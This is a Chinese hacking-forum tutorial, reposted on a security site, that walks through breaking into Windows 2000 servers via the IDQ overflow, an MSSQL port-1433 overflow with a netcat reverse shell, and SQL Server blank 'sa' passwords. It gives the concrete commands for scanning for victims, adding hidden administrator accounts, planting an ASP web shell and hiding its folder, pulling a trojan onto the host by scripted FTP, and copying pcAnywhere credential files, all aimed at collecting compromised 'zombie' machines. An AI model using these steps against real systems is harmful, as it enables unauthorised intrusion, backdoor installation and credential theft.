您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

入侵溢出学习面面俱到

2005-9-15 19:38| 投稿: security

摘要: 一       IDQ溢出 需要系统和工具:WIN 98/ME/2000/NT,IDQGUI工具。SUPERSCAN扫...
一       IDQ溢出 需要系统和工具:WIN 98/ME/2000/NT,IDQGUI工具。SUPERSCAN扫描器。NC.EXE     本方法对 WIN 2000主机有效。     第一步:      运行SUPERSCAN扫描器,定义IP段,扫描的端口设置成3389。这样不一会,你就能扫到数台3389口开着的机器。       第二步:        运行IDQGUI程序,出现一个窗口,       填好要入侵的主机IP,选取所对应的系统SP补丁栏,其他设置不改,取默认。然后按右下角的IDQ益出键。 screen.width-400)this.width=screen.width-400" border=0 dypop="按此在新窗口浏览图片"> 如果成功 如图 如果不成功会提示连接错误。 第三步: 连接成功后,我们打开WIN下的DOS状态,输入:NC -VV X.X.X.X 813 screen.width-400)this.width=screen.width-400" border=0 dypop="按此在新窗口浏览图片"> 如果成功 如图 不成功的话可以在IDQGUI程序里换另一个SP补丁栏试试,如果都不行,就放弃。换其他漏洞机器。 成功后你可以用net user 创建用户,用NET LOCALGROUP 加入管理员权限。呵呵,这样你就又可以用2000客户端 进入主机了,那你就又多了一台肉鸡。 总结一句,每种方法用不同的工具组合,都会产生不同的效果。所以成功之余也要多实验练习。这样才能举一反三。 有些朋友说不成功,其实这是对方主机打了SP3的,溢出漏洞对于打了SP3的主机无效! 在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exewww.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>pinwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。 screen.width-400)this.width=screen.width-400" border=0> 第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东www.sandflee.net也有下。看看入侵方法,我以前在小榕论坛贴的:lcx的win98下sa空密码入侵脚本20步 1.如何找到sa空密码肉鸡?自己用流光扫吧。 2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。 3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘 4.用supersqlexec联接成功。在命令行中输入: screen.width-400)this.width=screen.width-400" border=0> net user guest /active:yes(>指肉鸡回显下同)The command completed successfully.net user guest 123456> The command completed successfullynet localgroup administrators guest /add> The command completed successfully.这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。 5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。 6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开   ipc$? 7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思  不得其解。(注:net start命令列表) 我后来换wn2000的cmd下net use \\ip\ipc$Content$nbsp;"123456" /user:"guest"也不能联接成功。 8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip 9.回到sqlexe命令行中net use x: \\本机ip\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器  显示命令成功完成。(lcx注:net命令的详细用法) 10.sqlexe命令行中运行set得知其主页位置在d:\inetpub\wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。 11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot,这个目录是肉鸡网站的目录。 12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。  md d:\inetpub\wwwroot\aspmm 13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\inetpub\wwwroot\aspmm\.再将目录隐藏    attrib +h d:\inetpub\wwwroot\aspmm 14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来   copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。 15.在自己本机上建立up.txt内容如下:open ftp1.go.163.com(说明:这里是指我用得是网易ftp)username(说明:你的上传用户名)password(说明:密码)get lcx.exe(说明:你要上传到肉鸡的文件名)bye(说明:退出ftp)通过映射copy到肉鸡的c:\up.txt16.sqlexec命令行中ftp -s:c:\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\winnt\system32\下了。17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?19.通过一天的dos8.3规则的补习才知应是这样 : copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=74120.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。 其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部